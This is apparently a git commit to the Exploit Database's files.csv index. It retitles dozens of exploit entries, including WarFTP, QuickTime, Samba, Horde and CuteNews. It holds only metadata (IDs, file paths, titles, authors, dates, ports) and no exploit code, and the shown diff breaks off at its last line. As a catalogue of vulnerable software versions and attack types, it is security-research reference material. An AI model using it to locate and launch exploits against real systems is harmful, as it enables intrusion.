DB: 2016-10-26
1 new exploits WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Python) WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Perl) Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH) (PoC) Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH) Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (Internet Explorer 7 / Firefox / Opera) Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal Exploit PHP-CON 1.3 - (include.php) Remote File Inclusion PHP-CON 1.3 - 'include.php' Remote File Inclusion RealPlayer 11 - Malformed AU File Denial of Service RealPlayer 11 - '.au' Denial of Service VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization (PoC) VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization Nullsoft Winamp 5.32 - MP4 tags Stack Overflow Nullsoft Winamp 5.32 - MP4 Tags Stack Overflow viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion ViArt CMS/Shop/Helpdesk 3.3.2 - Remote File Inclusion Samba 3.0.27a - send_mailslot() Remote Buffer Overflow (PoC) Samba 3.0.27a - send_mailslot() Remote Buffer Overflow Horde Web-Mail 3.x - (go.php) Remote File Disclosure CuteNews 1.1.1 - (html.php) Remote Code Execution Horde Web-Mail 3.x - 'go.php' Remote File Disclosure CuteNews 1.1.1 - 'html.php' Remote Code Execution TUTOS 1.3 - (cmd.php) Remote Command Execution TUTOS 1.3 - 'cmd.php' Remote Command Execution PHP Webquest 2.6 - (id_actividad) SQL Injection Move Networks Quantum Streaming Player - Overwrite (SEH) Gateway Weblaunch - ActiveX Control Insecure Method Exploit PHP Webquest 2.6 - 'id_actividad' Parameter SQL Injection Move Networks Quantum Streaming Player - SEH Overflow Gateway Weblaunch - ActiveX Control Insecure Method Microsoft FoxServer - (vfp6r.dll 6.0.8862.0) ActiveX Command Execution Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method Microsoft FoxServer - 'vfp6r.dll 6.0.8862.0' ActiveX Command Execution Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC) McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC) Microsoft Visual InterDev 6.0 - (SP6) .sln File Local Buffer Overflow Microsoft Visual InterDev 6.0-SP6 - '.sln' Local Buffer Overflow StreamAudio ChainCast ProxyManager - ccpm_0237.dll Buffer Overflow StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Buffer Overflow XnView 1.92.1 - Slideshow (FontName) Buffer Overflow XnView 1.92.1 - (FontName) Slideshow Buffer Overflow Phaos R4000 Version (file) - Remote File Disclosure Phaos R4000 Version - 'file' Remote File Disclosure ASPPortal Free Version (Topic_Id) - SQL Injection ASPPortal Free Version - 'Topic_Id' SQL Injection Alibaba Clone Tritanium Version (news_desc.html) - SQL Injection Alibaba Clone Tritanium Version - 'news_desc.html' SQL Injection XnView 1.97.4 - MBM File Remote Heap Buffer Overflow XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow Fortigate OS Version 4.x < 5.0.7 - SSH Backdoor Fortigate OS 4.x < 5.0.7 - SSH Backdoor Network Scanner Version 4.0.0.0 - SEH Crash (PoC) Network Scanner 4.0.0.0 - SEH Crash (PoC) Ruby on Rails - Dynamic Render File Upload Remote Code Execution Ruby on Rails - Dynamic Render File Upload / Remote Code Execution Network Scanner 4.0.0 - SEH Local Buffer Overflow
This commit is contained in:
Offensive Security
parent
8330920f32
commit
f1ca42d762
3 changed files with 105 additions and 30 deletions
59
files.csv
59
files.csv
|
|
@ -3143,14 +3143,14 @@ id,file,description,date,author,platform,type,port
|
|||
3471,platforms/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Inclusion",2007-03-13,the_day,php,webapps,0
|
||||
3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - 'ROOT_PATH' Remote File Inclusion",2007-03-13,the_day,php,webapps,0
|
||||
3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0
|
||||
3474,platforms/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow",2007-03-14,"Winny Thomas",windows,remote,21
|
||||
3474,platforms/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Python)",2007-03-14,"Winny Thomas",windows,remote,21
|
||||
3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps,0
|
||||
3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) SQL Injection",2007-03-14,WiLdBoY,php,webapps,0
|
||||
3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0
|
||||
3479,platforms/linux/local/3479.php,"PHP 5.2.1 - session_regenerate_id() Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
|
||||
3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
|
||||
3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - (AdminBlogNewsEdit.asp) Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0
|
||||
3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow",2007-03-15,"Umesh Wanve",windows,remote,21
|
||||
3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Perl)",2007-03-15,"Umesh Wanve",windows,remote,21
|
||||
3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) SQL Injection",2007-03-15,x666,php,webapps,0
|
||||
3484,platforms/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0
|
||||
3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,php,webapps,0
|
||||
|
|
@ -4299,7 +4299,7 @@ id,file,description,date,author,platform,type,port
|
|||
4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 - (index.php cat) SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0
|
||||
4646,platforms/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 - article.php SQL Injection",2007-11-22,Shadowleet,php,webapps,0
|
||||
4647,platforms/cgi/webapps/4647.txt,"KB-Bestellsystem - 'kb_whois.cgi' Command Execution",2007-11-22,"Zero X",cgi,webapps,0
|
||||
4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH) (PoC)",2007-11-23,h07,multiple,dos,0
|
||||
4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)",2007-11-23,h07,multiple,dos,0
|
||||
4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - SQL Injection",2007-11-23,"Aria-Security Team",php,webapps,0
|
||||
4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 Beta 5 - (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0
|
||||
4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 (Windows Vista / Windows XP) - RSTP Response Code Execution",2007-11-24,InTeL,windows,remote,0
|
||||
|
|
@ -4308,7 +4308,7 @@ id,file,description,date,author,platform,type,port
|
|||
4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0
|
||||
4655,platforms/php/webapps/4655.txt,"project alumni 1.0.9 - Cross-Site Scripting / SQL Injection",2007-11-24,tomplixsee,php,webapps,0
|
||||
4656,platforms/php/webapps/4656.txt,"RunCMS 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,php,webapps,0
|
||||
4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (Internet Explorer 7 / Firefox / Opera)",2007-11-26,muts,windows,remote,0
|
||||
4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal Exploit",2007-11-26,muts,windows,remote,0
|
||||
4658,platforms/php/webapps/4658.php,"RunCMS 1.6 - disclaimer.php Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps,0
|
||||
4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion",2007-11-25,ShAy6oOoN,php,webapps,0
|
||||
4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection",2007-11-25,"Khashayar Fereidani",php,webapps,0
|
||||
|
|
@ -4321,7 +4321,7 @@ id,file,description,date,author,platform,type,port
|
|||
4667,platforms/php/webapps/4667.txt,"PHP-Nuke NSN Script Depository 1.0.0 - Remote Source Disclosure",2007-11-27,KiNgOfThEwOrLd,php,webapps,0
|
||||
4668,platforms/php/webapps/4668.txt,"wpQuiz 2.7 - Multiple SQL Injections",2007-11-27,Kacper,php,webapps,0
|
||||
4669,platforms/php/webapps/4669.txt,"project alumni 1.0.9 - (index.php act) Local File Inclusion",2007-11-27,tomplixsee,php,webapps,0
|
||||
4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - (include.php) Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0
|
||||
4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - 'include.php' Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0
|
||||
4671,platforms/php/webapps/4671.txt,"EHCP 0.22.8 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0
|
||||
4672,platforms/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0
|
||||
4673,platforms/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal Exploit",2007-11-29,"Subreption LLC.",multiple,remote,0
|
||||
|
|
@ -4334,12 +4334,12 @@ id,file,description,date,author,platform,type,port
|
|||
4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 - (sFilePath) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0
|
||||
4681,platforms/php/webapps/4681.txt,"ftp Admin 0.1.0 - (Local File Inclusion / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2007-11-29,Omni,php,webapps,0
|
||||
4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0
|
||||
4683,platforms/windows/dos/4683.py,"RealPlayer 11 - Malformed AU File Denial of Service",2007-12-01,NtWaK0,windows,dos,0
|
||||
4683,platforms/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,windows,dos,0
|
||||
4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusion",2007-12-01,ShAy6oOoN,php,webapps,0
|
||||
4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0
|
||||
4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0
|
||||
4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0
|
||||
4688,platforms/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization (PoC)",2007-12-04,"Ricardo Narvaja",windows,dos,0
|
||||
4688,platforms/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization",2007-12-04,"Ricardo Narvaja",windows,dos,0
|
||||
4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0
|
||||
4690,platforms/osx/dos/4690.c,"Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0
|
||||
4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0
|
||||
|
|
@ -4354,7 +4354,7 @@ id,file,description,date,author,platform,type,port
|
|||
4700,platforms/windows/remote/4700.txt,"simple httpd 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0
|
||||
4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 MP4 - File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
|
||||
4702,platforms/windows/local/4702.pl,"Microsoft Windows Media Player 6.4 MP4 - File Stack Overflow (PoC)",2007-12-08,"SYS 49152",windows,local,0
|
||||
4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - MP4 tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
|
||||
4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
|
||||
4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 - (download_file.php) File Disclosure",2007-12-08,GoLd_M,php,webapps,0
|
||||
4705,platforms/php/webapps/4705.txt,"Flat PHP Board 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps,0
|
||||
4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 - 'index.php' SQL Injection",2007-12-09,S.W.A.T.,php,webapps,0
|
||||
|
|
@ -4373,7 +4373,7 @@ id,file,description,date,author,platform,type,port
|
|||
4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php template' Local File Inclusion",2007-12-11,MhZ91,php,webapps,0
|
||||
4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,windows,remote,0
|
||||
4721,platforms/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0
|
||||
4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0
|
||||
4722,platforms/php/webapps/4722.txt,"ViArt CMS/Shop/Helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0
|
||||
4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - super_blob Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0
|
||||
4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow",2007-12-12,muts,windows,remote,80
|
||||
4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 - config[fsBase] Remote File Inclusion",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0
|
||||
|
|
@ -4383,7 +4383,7 @@ id,file,description,date,author,platform,type,port
|
|||
4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 - (filedownload.php) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0
|
||||
4730,platforms/asp/webapps/4730.txt,"hosting controller 6.1 hot fix 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0
|
||||
4731,platforms/php/webapps/4731.php,"Adult Script 1.6 - Unauthorized Administrative Access",2007-12-13,Liz0ziM,php,webapps,0
|
||||
4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - send_mailslot() Remote Buffer Overflow (PoC)",2007-12-14,x86,linux,dos,0
|
||||
4732,platforms/linux/dos/4732.c,"Samba 3.0.27a - send_mailslot() Remote Buffer Overflow",2007-12-14,x86,linux,dos,0
|
||||
4733,platforms/php/webapps/4733.txt,"123tkShop 0.9.1 - Remote Authentication Bypass",2007-12-14,"Michael Brooks",php,webapps,0
|
||||
4734,platforms/php/webapps/4734.txt,"Anon Proxy Server 0.1000 - Remote Command Execution",2007-12-14,"Michael Brooks",php,webapps,0
|
||||
4735,platforms/php/webapps/4735.txt,"Oreon 1.4 / Centreon 1.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-12-14,"Michael Brooks",php,webapps,0
|
||||
|
|
@ -4499,8 +4499,8 @@ id,file,description,date,author,platform,type,port
|
|||
4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion",2008-01-06,"Eugene Minaev",php,webapps,0
|
||||
4848,platforms/asp/webapps/4848.txt,"PortalApp 4.0 - (SQL Injection / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2008-01-06,r3dm0v3,asp,webapps,0
|
||||
4849,platforms/php/webapps/4849.txt,"LoudBlog 0.6.1 - (parsedpage) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0
|
||||
4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - (go.php) Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0
|
||||
4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - (html.php) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0
|
||||
4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - 'go.php' Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0
|
||||
4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - 'html.php' Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0
|
||||
4852,platforms/php/webapps/4852.txt,"netrisk 1.9.7 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-01-06,"Virangar Security",php,webapps,0
|
||||
4853,platforms/php/webapps/4853.php,"DCP-Portal 6.11 - SQL Injection",2008-01-06,x0kster,php,webapps,0
|
||||
4854,platforms/php/webapps/4854.txt,"SineCMS 2.3.5 - Local File Inclusion / Remote Code Execution",2008-01-06,KiNgOfThEwOrLd,php,webapps,0
|
||||
|
|
@ -4510,23 +4510,23 @@ id,file,description,date,author,platform,type,port
|
|||
4858,platforms/php/webapps/4858.pl,"FlexBB 0.6.3 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0
|
||||
4859,platforms/php/webapps/4859.txt,"EkinBoard 1.1.0 - Arbitrary File Upload / Authentication Bypass",2008-01-07,"Eugene Minaev",php,webapps,0
|
||||
4860,platforms/php/webapps/4860.pl,"Eggblog 3.1.0 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0
|
||||
4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - (cmd.php) Remote Command Execution",2008-01-07,Houssamix,php,webapps,0
|
||||
4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - 'cmd.php' Remote Command Execution",2008-01-07,Houssamix,php,webapps,0
|
||||
4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow",2008-01-07,"Thomas Pollet",linux,remote,0
|
||||
4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 - Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",php,webapps,0
|
||||
4864,platforms/php/webapps/4864.txt,"ZeroCMS 1.0 Alpha - Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
|
||||
4865,platforms/php/webapps/4865.txt,"evilboard 0.1a - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0
|
||||
4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow",2008-01-08,ryujin,windows,remote,0
|
||||
4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - (id_actividad) SQL Injection",2008-01-08,ka0x,php,webapps,0
|
||||
4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - Overwrite (SEH)",2008-01-08,Elazar,windows,remote,0
|
||||
4869,platforms/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method Exploit",2008-01-08,Elazar,windows,remote,0
|
||||
4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - 'id_actividad' Parameter SQL Injection",2008-01-08,ka0x,php,webapps,0
|
||||
4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - SEH Overflow",2008-01-08,Elazar,windows,remote,0
|
||||
4869,platforms/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method",2008-01-08,Elazar,windows,remote,0
|
||||
4870,platforms/php/webapps/4870.txt,"osData 2.08 Modules Php121 - Local File Inclusion",2008-01-09,"Cold Zero",php,webapps,0
|
||||
4871,platforms/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password",2008-01-09,Dj7xpl,php,webapps,0
|
||||
4872,platforms/php/webapps/4872.txt,"PHP Webquest 2.6 - Get Database Credentials",2008-01-09,MhZ91,php,webapps,0
|
||||
4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - (vfp6r.dll 6.0.8862.0) ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0
|
||||
4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0
|
||||
4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - 'vfp6r.dll 6.0.8862.0' ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0
|
||||
4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method",2008-01-09,shinnai,windows,remote,0
|
||||
4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates - Local File Inclusion",2008-01-09,DSecRG,php,webapps,0
|
||||
4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution",2008-01-09,"Luigi Auriemma",multiple,remote,7210
|
||||
4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0
|
||||
4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server 8.5.2 - Remote Unauthenticated Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0
|
||||
4879,platforms/php/webapps/4879.php,"Docebo 3.5.0.3 - (lib.regset.php) Command Execution",2008-01-09,EgiX,php,webapps,0
|
||||
4880,platforms/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0
|
||||
4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash",2008-01-10,kingcope,solaris,dos,0
|
||||
|
|
@ -4540,9 +4540,9 @@ id,file,description,date,author,platform,type,port
|
|||
4889,platforms/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusion",2008-01-11,k1n9k0ng,php,webapps,0
|
||||
4890,platforms/php/webapps/4890.txt,"AJchat 0.10 - unset() bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0
|
||||
4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - (lib.regset.php/non-blind) SQL Injection",2008-01-11,rgod,php,webapps,0
|
||||
4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 - (SP6) .sln File Local Buffer Overflow",2008-01-11,shinnai,windows,local,0
|
||||
4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0-SP6 - '.sln' Local Buffer Overflow",2008-01-11,shinnai,windows,local,0
|
||||
4893,platforms/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service",2008-01-11,"Clemens Kurtenbach",linux,dos,0
|
||||
4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - ccpm_0237.dll Buffer Overflow",2008-01-11,Elazar,windows,remote,0
|
||||
4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Buffer Overflow",2008-01-11,Elazar,windows,remote,0
|
||||
4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps,0
|
||||
4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - 'delete id' Remote Authentication Bypass",2008-01-11,Pr0metheuS,php,webapps,0
|
||||
4897,platforms/php/webapps/4897.pl,"photokron 1.7 - (update script) Remote Database Disclosure",2008-01-11,Pr0metheuS,php,webapps,0
|
||||
|
|
@ -4986,7 +4986,7 @@ id,file,description,date,author,platform,type,port
|
|||
5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0
|
||||
5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0
|
||||
5345,platforms/php/webapps/5345.txt,"Joomla! Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0
|
||||
5346,platforms/windows/local/5346.pl,"XnView 1.92.1 - Slideshow (FontName) Buffer Overflow",2008-04-02,haluznik,windows,local,0
|
||||
5346,platforms/windows/local/5346.pl,"XnView 1.92.1 - (FontName) Slideshow Buffer Overflow",2008-04-02,haluznik,windows,local,0
|
||||
5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - (prefixdir) Local File Inclusion",2008-04-02,w0cker,php,webapps,0
|
||||
5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion",2008-04-02,w0cker,php,webapps,0
|
||||
5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 - (SP6) SLN File Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0
|
||||
|
|
@ -5059,7 +5059,7 @@ id,file,description,date,author,platform,type,port
|
|||
5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0
|
||||
5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin",2008-04-09,t0pP8uZz,php,webapps,0
|
||||
5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure",2008-04-09,JIKO,php,webapps,0
|
||||
5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0
|
||||
5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version - 'file' Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0
|
||||
5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection",2008-04-09,"Virangar Security",php,webapps,0
|
||||
5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - (category id) Blind SQL Injection",2008-04-10,irvian,php,webapps,0
|
||||
5423,platforms/php/webapps/5423.txt,"Ksemail - 'index.php language' Local File Inclusion",2008-04-10,dun,php,webapps,0
|
||||
|
|
@ -5404,7 +5404,7 @@ id,file,description,date,author,platform,type,port
|
|||
5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - (comments) SQL Injection",2008-06-10,Unohope,php,webapps,0
|
||||
5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0
|
||||
5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - (index) SQL Injection",2008-06-10,Unohope,php,webapps,0
|
||||
5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version (Topic_Id) - SQL Injection",2008-06-10,JosS,php,webapps,0
|
||||
5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version - 'Topic_Id' SQL Injection",2008-06-10,JosS,php,webapps,0
|
||||
5776,platforms/php/webapps/5776.txt,"Experts 1.0.0 - (answer.php) SQL Injection",2008-06-10,"CWH Underground",php,webapps,0
|
||||
5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,windows,remote,0
|
||||
5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0
|
||||
|
|
@ -24760,7 +24760,7 @@ id,file,description,date,author,platform,type,port
|
|||
27602,platforms/php/webapps/27602.txt,"DotNetNuke DNNArticle Module 10.0 - SQL Injection",2013-08-15,"Sajjad Pourali",php,webapps,0
|
||||
27603,platforms/php/webapps/27603.txt,"w-CMS 2.0.1 - Remote Code Execution",2013-08-15,ICheer_No0M,php,webapps,0
|
||||
27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",windows,remote,0
|
||||
27605,platforms/php/webapps/27605.txt,"Alibaba Clone Tritanium Version (news_desc.html) - SQL Injection",2013-08-15,IRAQ_JAGUAR,php,webapps,0
|
